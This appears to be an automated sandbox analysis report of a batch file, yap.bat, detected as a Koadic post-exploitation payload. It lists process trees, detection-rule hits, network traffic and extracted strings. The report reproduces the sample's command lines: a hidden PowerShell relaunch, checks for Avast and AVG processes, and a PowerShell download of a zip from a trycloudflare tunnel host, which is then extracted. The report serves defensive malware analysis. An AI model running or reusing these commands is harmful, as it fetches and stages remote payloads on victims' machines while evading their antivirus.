Edit tour

Windows Analysis Report
yap.bat

Overview

General Information

Sample name:	yap.bat
Analysis ID:	1663711
MD5:	577d022599897eeef1e94a76ce61c4ac
SHA1:	972b1de7f05f8737c93784524d6a918a89c5ee99
SHA256:	a55a9a2336b9406cf4ddd3c29ec3c393f3810efe3e92658dce1de61da6d9a2f0
Tags:	batWsgiDAVuser-JAMESWT_WT
Infos:

Detection

Koadic

Score:	76
Range:	0 - 100
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Suspicious powershell command line found

Yara detected JavaScript embedded in SVG

Yara detected Koadic BAT payload

AV process strings found (often used to terminate AV products)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

DNS query to tunneling platform domain

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6976 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\yap.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7108 cmdline: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 2944 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\yap.bat" hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Acrobat.exe (PID: 2236 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\YPSIACHYXW.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 344 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 7392 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1568,i,3081941811078344986,2843059504850167928,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

timeout.exe (PID: 3672 cmdline: timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) MD5: 100065E21CFBBDE57CBA2838921F84D6)

tasklist.exe (PID: 6340 cmdline: tasklist /FI "IMAGENAME eq AvastUI.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 6248 cmdline: find /i "AvastUI.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

tasklist.exe (PID: 7152 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 6120 cmdline: find /i "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

powershell.exe (PID: 3816 cmdline: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 1372 cmdline: powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Koadic	Koadic is an open-source post-exploitation framework for Windows, created by zerosum0x0 and available on GitHub. The framework is written in Python and can generate JScript and VBScript payloads which can be written to disk or mapped directly into memory. Its capabilities include remote desktop access, command execution, lateral movement via SMB, file transfer, credential theft using Mimikatz, port scanning, and system information collection. It can also collect specific system information and targeted files based on their name or extension.	APT28 Stone Panda	http://www.secureworks.com/research/threat-profiles/cobalt-ulster http://www.secureworks.com/research/threat-profiles/gold-drake https://blog.tofile.dev/2020/11/28/koadic_jarm.html https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf https://github.com/zerosum0x0/koadic	https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
yap.bat	JoeSecurity_KoadicBATpayload	Yara detected Koadic BAT payload	Joe Security
yap.bat	MALWARE_BAT_KoadicBAT	Koadic post-exploitation framework BAT payload	ditekSHen	0x2:$s1: &@cls&@set 0x5e:$s2: :~30,1%% 0x6a:$s2: :~44,1%% 0x76:$s2: :~9,1% 0x83:$s2: :~58,1%% 0x8f:$s2: :~14,1%% 0x9b:$s2: :~30,1%% 0xa7:$s2: :~52,1%% 0xb3:$s2: :~39,1%% 0xbf:$s2: :~12,1%% 0xcb:$s2: :~39,1%% 0xd7:$s2: :~25,1%% 0xe3:$s2: :~25,1% 0xf3:$s2: :~12,1%% 0xff:$s2: :~13,1%% 0x10b:$s2: :~14,1%% 0x117:$s2: :~44,1%% 0x123:$s2: :~34,1%% 0x12f:$s2: :~7,1%% 0x13a:$s2: :~4,1%% 0x145:$s2: :~30,1%%

Dropped Files

Source	Rule	Description	Author
C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\tutorial\floatingpoint.html	JoeSecurity_JavaScriptembeddedinSVG	Yara detected JavaScript embedded in SVG	Joe Security
C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\reference\executionmodel.html	JoeSecurity_JavaScriptembeddedinSVG	Yara detected JavaScript embedded in SVG	Joe Security
C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\reference\toplevel_components.html	JoeSecurity_JavaScriptembeddedinSVG	Yara detected JavaScript embedded in SVG	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000005.00000003.1243785632.0000023995B58000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_KoadicBATpayload	Yara detected Koadic BAT payload	Joe Security
00000005.00000002.2455424741.0000023995AE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_KoadicBATpayload	Yara detected Koadic BAT payload	Joe Security
Process Memory Space: cmd.exe PID: 2944	JoeSecurity_KoadicBATpayload	Yara detected Koadic BAT payload	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1372, TargetFilename: C:\Users\user\Downloads\Extracted\Python\Launcher\py.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\yap.bat" hidden , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2944, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 3816, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\yap.bat" hidden , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2944, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 3816, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden", CommandLine: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\yap.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6976, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden", ProcessId: 7108, ProcessName: powershell.exe

Suricata Signatures

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-12T08:41:31.607782+0200	1810000	2	Potentially Bad Traffic	192.168.2.6	49687	104.16.231.132	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: yap.bat	Virustotal: Detection: 13%			Perma Link
Source: yap.bat	ReversingLabs: Detection: 16%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 98.6%

Phishing

Yara detected JavaScript embedded in SVG

Source: Yara match	File source: C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\tutorial\floatingpoint.html, type: DROPPED
Source: Yara match	File source: C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\reference\executionmodel.html, type: DROPPED
Source: Yara match	File source: C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\reference\toplevel_components.html, type: DROPPED

Source: unknown

HTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.6:49687 version: TLS 1.2

Source:	Binary string: <p>The <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> class constructor has a new optional <em>readrc</em> argument source: 3.6.html.24.dr
Source:	Binary string: <td><p>Install debugging symbols (<code class="docutils literal notranslate"><span class="pre">*.pdb</span></code>)</p></td> source: windows.html2.24.dr
Source:	Binary string: <li><a href="library/pdb.html#pdb.Pdb.run">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
Source:	Binary string: .pdbrc source: genindex-all.html.24.dr
Source:	Binary string: <li><a href="library/pdb.html#index-1">Pdb (class in pdb)</a>, <a href="library/pdb.html#pdb.Pdb">[1]</a> source: genindex-all.html.24.dr
Source:	Binary string: <li><a href="library/pdb.html#pdb.Pdb.set_trace">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
Source:	Binary string: <li><a href="library/pdb.html#pdb.Pdb.runeval">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
Source:	Binary string: <p>On Windows now <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> supports <code class="docutils literal notranslate"><span class="pre">~/.pdbrc</span></code>. source: 3.9.html.24.dr
Source:	Binary string: <li><a href="library/pdb.html#pdb.Pdb.runcall">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
Source:	Binary string: <li><a href="library/pdb.html#index-2">.pdbrc</a> source: genindex-all.html.24.dr
Source:	Binary string: to control whether <code class="docutils literal notranslate"><span class="pre">.pdbrc</span></code> files should be read.</p> source: 3.6.html.24.dr

Source: unknown

DNS query to tunneling platform domain: name: german-tan-exotic-collectibles.trycloudflare.com

Source: Joe Sandbox View

IP Address: 104.16.231.132 104.16.231.132

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49687 -> 104.16.231.132:443

Source: global traffic

HTTP traffic detected: GET /bab.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: german-tan-exotic-collectibles.trycloudflare.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /bab.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: german-tan-exotic-collectibles.trycloudflare.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Microsoft-CryptoAPI/10.0Host: x1.i.lencr.org

Source: 2.6.html.24.dr

String found in binary or memory: with closing(urllib.urlopen('http://www.yahoo.com')) as f: equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: german-tan-exotic-collectibles.trycloudflare.com
Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org

Source: xmlrpc.client.html.24.dr	String found in binary or memory: http://betty.userland.com'
Source: xmlrpc.client.html.24.dr	String found in binary or memory: http://betty.userland.com"
Source: xml.etree.elementtree.html.24.dr	String found in binary or memory: http://example.org/"
Source: terminal256.cpython-312.pyc.24.dr	String found in binary or memory: http://frexx.de/xterm-256-notes/data/xterm256-conv2.tar.bz2)
Source: xmlrpc.client.html.24.dr	String found in binary or memory: http://google.com/"
Source: constants.py.24.dr, sslproto.py.24.dr	String found in binary or memory: http://magic.io
Source: powershell.exe, 0000000D.00000002.1819134442.00000242B4732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1819134442.00000242B45EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: xmlrpc.client.html.24.dr	String found in binary or memory: http://ontosys.com/xml-rpc/extensions.php
Source: powershell.exe, 0000000D.00000002.1774446533.00000242A47A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823076447.00000242BC750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.1774446533.00000242A4581000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 2.4.html.24.dr, _pydecimal.py.24.dr	String found in binary or memory: http://speleotrove.com/decimal/
Source: powershell.exe, 0000000D.00000002.1774446533.00000242A47A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823076447.00000242BC750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2.4.html.24.dr	String found in binary or memory: http://www.lahey.com/float.htm
Source: 2D85F72862B55C4EADD9E66E06947F3D0.14.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: xmlrpc.client.html.24.dr	String found in binary or memory: http://xmlrpc.scripting.com/spec.html
Source: powershell.exe, 0000000D.00000002.1774446533.00000242A4581000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: android.py.24.dr	String found in binary or memory: https://android.stackexchange.com/a/216132
Source: git.py.24.dr	String found in binary or memory: https://article.gmane.org/gmane.comp.version-control.git/146500)
Source: pythread.h.24.dr	String found in binary or memory: https://bugs.python.org/issue31370
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=10049
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=10076
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=10379
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=10381
Source: 3.7.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=10544
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=11549
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=11822
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=11913
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1198569
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=12844
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=13802
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=14191
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=14976
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=15216
Source: 3.7.html.24.dr, 3.6.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1529353
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=15786
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1580
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=15873
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1612262
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=16285
Source: 3.4.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=16475
Source: 3.4.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=16499
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=16500
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1655
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1664
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1696199
Source: 3.1.html.24.dr, 2.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1739468
Source: 3.7.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=17535
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=1818
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=18896
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=18966
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=19764
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=19930
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=20361
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=20486
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=20804
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=20825
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=20995
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=21071
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=21417
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=21423
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=21862
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=22257
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=22589
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=22807
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=22898
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=23033
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=23699
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=23749
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=23835
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=24700
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=24744
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=24821
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=25054
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=25612
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=25658
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=25942
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=25988
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=25996
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=26110
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=26121
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=26273
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=26510
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=27099
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=27456
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=27584
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=27645
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=27867
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=27979
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28124
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28134
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28137
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28280
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28292
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28332
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28411
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28414
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28564
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28638
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28682
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28685
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28692
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28707
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28740
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28761
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28769
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28799
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28822
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28847
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28894
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28927
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=28974
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29102
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29136
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29137
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29192
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29193
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29218
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29240
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29286
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29300
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29302
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29377
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29452
